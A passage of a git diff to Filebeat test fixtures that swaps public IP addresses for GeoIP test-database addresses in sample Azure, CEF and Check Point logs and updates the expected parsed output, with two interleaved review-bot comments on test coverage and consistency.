77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"8.8.8.8\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"175.16.199.1\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"175.16.199.1\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
 "event.outcome": "failure",
 "event.type": [
 "info"
@@ -144,21 +147,22 @@
 "geo.location.lon": 2.12341234,
 "input.type": "log",
 "log.level": "4",
- "log.offset": 1676,
+ "log.offset": 1688,
 "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
 "related.ip": [
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "azure",
- "source.address": "8.8.8.8",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "8.8.8.8",
+ "source.address": "175.16.199.1",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
diff --git a/x-pack/filebeat/module/cef/log/test/cef.log b/x-pack/filebeat/module/cef/log/test/cef.log
index 1e8ab441ff7f..6771918106f0 100644
--- a/x-pack/filebeat/module/cef/log/test/cef.log
+++ b/x-pack/filebeat/module/cef/log/test/cef.log
@@ -1,4 +1,4 @@
-CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=6.7.8.9 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart
-CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=6.7.8.9 spt=33876 dst=1.2.3.4 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb
+CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=1.128.3.4 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart
+CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=1.128.3.4 spt=33876 dst=81.2.69.143 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb
 CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|spriv=user dpriv=root
 CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|message=This event is padded with whitespace dst=192.168.1.2 src=192.168.3.4
diff --git a/x-pack/filebeat/module/cef/log/test/cef.log-expected.json b/x-pack/filebeat/module/cef/log/test/cef.log-expected.json
index 76698d44be5d..e1a72b5c49a7 100644
--- a/x-pack/filebeat/module/cef/log/test/cef.log-expected.json
+++ b/x-pack/filebeat/module/cef/log/test/cef.log-expected.json
@@ -10,7 +10,7 @@
 "cef.extensions.requestContext": "https://www.google.com",
 "cef.extensions.requestMethod": "POST",
 "cef.extensions.requestUrl": "https://www.example.com/cart",
- "cef.extensions.sourceAddress": "6.7.8.9",
+ "cef.extensions.sourceAddress": "1.128.3.4",
 "cef.extensions.sourceGeoLatitude": 38.915,
 "cef.extensions.sourceGeoLongitude": -77.511,
 "cef.extensions.sourcePort": 33876,
@@ -25,7 +25,7 @@
 "event.dataset": "cef.log",
 "event.id": 3457,
 "event.module": "cef",
- "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=6.7.8.9 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart",
+ "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=1.128.3.4 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart",
 "event.severity": 0,
 "fileset.name": "log",
 "http.request.method": "POST",
@@ -33,22 +33,21 @@
 "input.type": "log",
 "log.offset": 0,
 "message": "Web request",
- "network.community_id": "1:e2rSLr3fJ93cIJDMtVABFxSH5zg=",
+ "network.community_id": "1:sM8+9vcrxFfN3YaSsJNzJisAfBo=",
 "network.transport": "tcp",
 "observer.product": "Vaporware",
 "observer.vendor": "Elastic",
 "observer.version": "1.0.0-alpha",
 "related.ip": [
- "192.168.10.1",
- "6.7.8.9"
+ "1.128.3.4",
+ "192.168.10.1"
 ],
 "service.type": "cef",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "6.7.8.9",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
+ "source.geo.location.lat": 38.915,
+ "source.geo.location.lon": -77.511,
+ "source.ip": "1.128.3.4",
 "source.port": 33876,
 "source.service.name": "httpd",
 "tags": [
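Review bot: In the `@@ -33,22 +33,21 @@` hunk the expected `source.geo.location.lat`/`lon` move from the GeoIP-derived pair (37.751/-97.822) to the CEF-supplied `slat`/`slong` values (38.915/-77.511), which suggests the geoip step previously overwrote coordinates the event itself carried and now only fills them in because 1.128.3.4 has no city record in the test database. That precedence between event-supplied and database-derived coordinates is therefore no longer exercised by this fixture, so a regression in either direction would pass. If the overwrite is intended, one fixture line whose `src` carries both `slat`/`slong` and a geo entry in the test database (81.2.69.143, already used as `dst` in cef.log, is such an address) would pin it. This is inferred from the expected values alone; the pipeline definition is outside this diff.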
@@ -62,28 +61,28 @@
 "cef.device.product": "Vaporware",
 "cef.device.vendor": "Elastic",
 "cef.device.version": "1.0.0-alpha",
- "cef.extensions.destinationAddress": "1.2.3.4",
+ "cef.extensions.destinationAddress": "81.2.69.143",
 "cef.extensions.destinationPort": 443,
 "cef.extensions.destinationTranslatedAddress": "10.10.10.10",
 "cef.extensions.destinationUserName": "alice",
 "cef.extensions.eventId": 123,
 "cef.extensions.fileHash": "bc8bbe52f041fd17318f08a0f73762ce",
 "cef.extensions.oldFileHash": "a9796280592f86b74b27e370662d41eb",
- "cef.extensions.sourceAddress": "6.7.8.9",
+ "cef.extensions.sourceAddress": "1.128.3.4",
 "cef.extensions.sourcePort": 33876,
 "cef.extensions.sourceUserName": "bob",
 "cef.name": "Authentication",
 "cef.severity": "low",
 "cef.version": "0",
- "destination.geo.city_name": "Moscow",
+ "destination.geo.city_name": "London",
 "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "RU",
- "destination.geo.country_name": "Russia",
- "destination.geo.location.lat": 55.7527,
- "destination.geo.location.lon": 37.6172,
- "destination.geo.region_iso_code": "RU-MOW",
- "destination.geo.region_name": "Moscow",
- "destination.ip": "1.2.3.4",
+ "destination.geo.country_iso_code": "GB",
+ "destination.geo.country_name": "United Kingdom",
+ "destination.geo.location.lat": 51.5142,
+ "destination.geo.location.lon": -0.0931,
+ "destination.geo.region_iso_code": "GB-ENG",
+ "destination.geo.region_name": "England",
+ "destination.ip": "81.2.69.143",
 "destination.nat.ip": "10.10.10.10",
 "destination.port": 443,
 "destination.user.name": "alice",
@@ -91,11 +90,11 @@
 "event.dataset": "cef.log",
 "event.id": 123,
 "event.module": "cef",
- "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=6.7.8.9 spt=33876 dst=1.2.3.4 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb",
+ "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=1.128.3.4 spt=33876 dst=81.2.69.143 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb",
 "event.severity": 0,
 "fileset.name": "log",
 "input.type": "log",
- "log.offset": 269,
+ "log.offset": 271,
 "message": "Authentication",
 "observer.product": "Vaporware",
 "observer.vendor": "Elastic",
@@ -105,21 +104,18 @@
 "bc8bbe52f041fd17318f08a0f73762ce"
 ],
 "related.ip": [
- "1.2.3.4",
+ "1.128.3.4",
 "10.10.10.10",
- "6.7.8.9"
+ "81.2.69.143"
 ],
 "related.user": [
 "alice",
 "bob"
 ],
 "service.type": "cef",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "6.7.8.9",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
+ "source.ip": "1.128.3.4",
 "source.port": 33876,
 "source.user.name": "bob",
 "tags": [
@@ -145,7 +141,7 @@
 "event.severity": 0,
 "fileset.name": "log",
 "input.type": "log",
- "log.offset": 531,
+ "log.offset": 539,
 "message": "Authentication",
 "observer.product": "Vaporware",
 "observer.vendor": "Elastic",
@@ -176,7 +172,7 @@
 "event.severity": 0,
 "fileset.name": "log",
 "input.type": "log",
- "log.offset": 611,
+ "log.offset": 619,
 "message": "This event is padded with whitespace",
 "observer.product": "Vaporware",
 "observer.vendor": "Elastic",
diff --git a/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json b/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json
index 237e6f0a8d5b..2a16101ee237 100644
--- a/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json
+++ b/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json
@@ -43,16 +43,6 @@
 "cef.name": "https",
 "cef.severity": "Unknown",
 "cef.version": "0",
- "destination.as.number": 8075,
- "destination.as.organization.name": "Microsoft Corporation",
- "destination.geo.city_name": "Des Moines",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 41.6006,
- "destination.geo.location.lon": -93.6112,
- "destination.geo.region_iso_code": "US-IA",
- "destination.geo.region_name": "Iowa",
 "destination.ip": "52.173.84.157",
 "destination.nat.ip": "0.0.0.0",
 "destination.nat.port": 0,
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log
index c09c614f38c3..45ef5313c20b 100644
--- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log
+++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log
@@ -209,7 +209,7 @@
 <134>1 2020-03-29T13:44:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a657,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59229"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:44:57Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a659,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:44:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49784"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49784"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42424"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10044"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47157"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63042"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26713"; xlatesrc:"0.0.0.0"]
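Review bot: Only the `dst:"8.8.8.8"` destination is swapped for a GeoLite2 test-range address in this hunk, while the unchanged context lines right after it still carry live public destinations (`dst:"104.99.234.45"`, `dst:"192.124.249.41"`), so the fixture ends up mixing test-database and real-world addresses. If the intent of this commit is, as it appears from the companion expected-JSON hunks, to confine fixtures to addresses the test GeoIP/ASN database resolves deterministically, those remaining destinations should be moved into the same ranges (for example `175.16.199.2`, or an RFC 5737 block such as `203.0.113.0/24`) and the expected output regenerated in the same pass. If they are being kept on purpose because they must not resolve, that decision is not recorded anywhere a future editor will see it; since a `.log` fixture has no comment syntax, a one-line note in the module's test README or the PR description would prevent the next contributor from repeating this substitution piecemeal. The same single-address swap is repeated in the later hunks of this file, so whichever way it is settled, apply it consistently across all of them.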
@@ -280,7 +280,7 @@ <134>1 2020-03-29T13:59:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50693"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T13:59:04Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9a8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T13:59:05Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9a9,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T13:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ac,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37471"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T13:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ac,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37471"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T13:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ac,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63318"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10061"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T13:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ad,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 